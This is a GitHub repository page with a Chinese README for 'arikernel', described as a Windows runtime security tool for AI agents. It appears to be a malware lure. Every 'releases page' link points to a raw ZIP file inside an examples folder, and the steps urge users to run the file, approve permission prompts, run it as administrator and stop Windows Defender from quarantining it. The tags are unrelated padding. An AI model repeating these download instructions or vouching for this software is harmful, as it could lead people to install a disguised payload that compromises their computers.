freepolice-20/arikernel
GitHub: freepolice-20/arikernel
为 Windows 平台的 AI Agent 提供运行时安全防护,通过策略管控和污点追踪拦截 Prompt 注入与数据渗出。
Stars: 0 | Forks: 0
# 🛡️ arikernel - 让 AI 行为尽在掌控
[](https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip)
## 🚀 arikernel 的功能
arikernel 是一个面向 AI agents 的 runtime 安全层。它会在工具调用运行前进行检查,并协助阻止危险行为。当你在 Windows 上运行 AI 应用时,使用它可以帮助减少 prompt injection、不安全的工具使用以及数据泄露。
## 📥 下载 arikernel
1. 打开 [arikernel releases 页面](https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip)
2. 找到最新的 release
3. 为您的设备下载 Windows 文件
4. 将文件保存到您容易找到的文件夹中
5. 打开文件并按照屏幕上的步骤操作
如果 Windows 请求权限,请选择 **Yes**,以便应用能够启动。
## 🖥️ 系统要求
- Windows 10 或 Windows 11
- 至少 4 GB RAM
- 200 MB 的可用磁盘空间
- 用于安装和更新的互联网访问
- 用于下载 release 的现代网络浏览器
为了获得最佳效果,请在安装前保持 Windows 处于最新状态。
## 🔧 如何安装
1. 前往 [releases 页面](https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip)
2. 从最新的 release 中下载 Windows 安装包
3. 打开您的 **Downloads** 文件夹
4. 双击您下载的文件
5. 如果出现安装窗口,请按照每一步操作
6. 选择安装文件夹或保留默认设置
7. 等待安装完成
8. 从快捷方式或安装文件夹启动 arikernel
如果文件位于 ZIP 文件夹中,请先右键单击并选择 **Extract All**(全部解压缩)。
## ▶️ 如何运行
安装后,从以下位置启动 arikernel:
- 桌面快捷方式
- Start 菜单
- 安装文件夹
如果应用打开了一个窗口,请在您的 AI agent 使用工具时保持其运行。arikernel 随后会根据其策略规则检查每一次工具调用。
## 🧭 首次设置
当您第一次运行 arikernel 时:
1. 审查默认策略 (policy)
2. 选择 AI 可以使用的工具
3. 为文件、网络访问和系统操作设置限制
4. 保存您的设置
5. 首先测试一个安全操作
一个好的首次测试是简单的工具调用,例如读取本地文件或打开一个无害的网页。
## 🔐 arikernel 协助防护的内容
arikernel 旨在帮助处理:
- prompt injection 防御
- 工具调用检查
- 不安全行为阻止
- 文件访问限制
- 网络请求控制
- 数据渗出预防
- AI agents 的策略检查
- 本地和远程 agent 应用的 runtime 安全
## 🛠️ 基本使用场景
如果您想要以下功能,请使用 arikernel:
- 在 PC 上运行 AI agent 并拥有更多控制权
- 阻止 agent 打开您未允许的文件
- 限制 agent 的网络请求
- 阻止不符合您规则的命令
- 保护敏感文本、密钥或文档
- 为 AI runtime 添加策略层
## 📂 典型文件夹布局
安装后,您可能会看到如下文件夹:
- `config` 用于存放设置
- `logs` 用于存放运行历史
- `policies` 用于存放规则文件
- `tools` 用于存放允许的操作
- `updates` 用于存放 release 文件
除非您有明确的理由更改,否则可以保留默认布局。
## ⚙️ 常用设置
以下是许多用户起初会使用的设置:
- 仅允许可信工具
- 阻止未知文件访问
- 限制剪贴板使用
- 限制网络调用
- 对危险操作要求审批
- 记录每一次工具调用
- 阻止试图访问个人数据的行为
请从严格的策略开始,然后仅根据需要放宽限制。
## 🧪 安全检查
设置完成后,测试以下项目:
1. 启动应用
2. 运行一个已知的安全操作
3. 尝试一个被阻止的操作
4. 检查日志文件
5. 确保策略符合您的选择
如果安全操作失败,请检查您的允许列表和设置。
## 🧯 如果出现故障
请尝试以下步骤:
- 重新下载最新的 release
- 检查文件是否已下载完成
- 在打开压缩包之前先解压
- 如果 Windows 阻止应用,请以管理员身份运行
- 重启 PC 并重试
- 在安装新版本之前移除旧文件
- 确保 Windows Defender 没有隔离该文件
如果应用仍然无法启动,请从 releases 页面重新下载文件。
## 📌 更新流程
要更新 arikernel:
1. 访问 [releases 页面](https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip)
2. 下载最新的 Windows 文件
3. 关闭旧版本
4. 安装或替换旧文件
5. 启动新版本
6. 检查您的设置是否仍然符合您的策略
在更新之前,请备份您的策略文件。
## 🔍 项目重点
arikernel 专注于:
- agent 安全
- AI runtime 控制
- prompt injection 防御
- 策略执行
- LLM 安全
- 工具调用检查
- AI 应用的网络安全
它面向希望在 Windows PC 上更多地控制 AI agent 行为的用户。
## 📎 Release 下载
使用此链接访问下载页面并获取最新的 Windows release:
[https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip](https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip)
## 🧩 您可能看到的文件类型
Release 页面可能提供以下文件之一:
- `.exe` 用于 Windows 安装程序
- `.zip` 用于压缩的应用程序包
- `.msi` 用于 Windows 安装文件
如果您看到 `.zip` 文件,请在运行应用前将其解压。
## 🧠 良好的首选策略
一个简单的首选策略可以包括:
- 允许可信的本地文件
- 阻止系统更改
- 阻止未知的网络请求
- 记录所有工具使用情况
- 在删除文件前询问
- 在将数据发送出 PC 前询问
这可以在降低风险的同时保持应用的实用性。
## 🖱️ 桌面使用
如果您每天都使用 arikernel:
- 在 agent 运行时保持应用打开
- 每次会话后查看日志
- 添加新工具时更新策略
- 阻止任何您不需要的操作
- 将敏感文件保存在单独的文件夹中
## 🔎 每次运行前的检查事项
在您通过 arikernel 启动 AI agent 之前:
1. 确认策略文件已加载
2. 确认允许的工具列表正确无误
3. 检查网络规则
4. 检查文件访问规则
5. 启动 agent 并观察第一次工具调用
## 📘 非技术用户指南
如果术语 policy、tool call 或 runtime 让您感到陌生,可以使用以下简单理解:
- **policy** 是一组规则
- **tool call** 是 AI 尝试执行的操作
- **runtime** 意味着应用在 AI 工作时处于活动状态
- **blocking** 意味着应用阻止某项操作
起初保持规则简单。仅在需要时添加更多内容。
标签:AI基础设施, AI安全, Chat Copilot, Conpot, DNS 反向解析, DNS 解析, Lerna, Streamlit, Windows安全, XSS注入, 可信计算, 安全内核, 工具调用控制, 智能体防护, 知识图谱, 端点安全, 策略执行, 红队防御, 自动化攻击, 补丁管理, 访问控制, 软件2.0, 运行时防护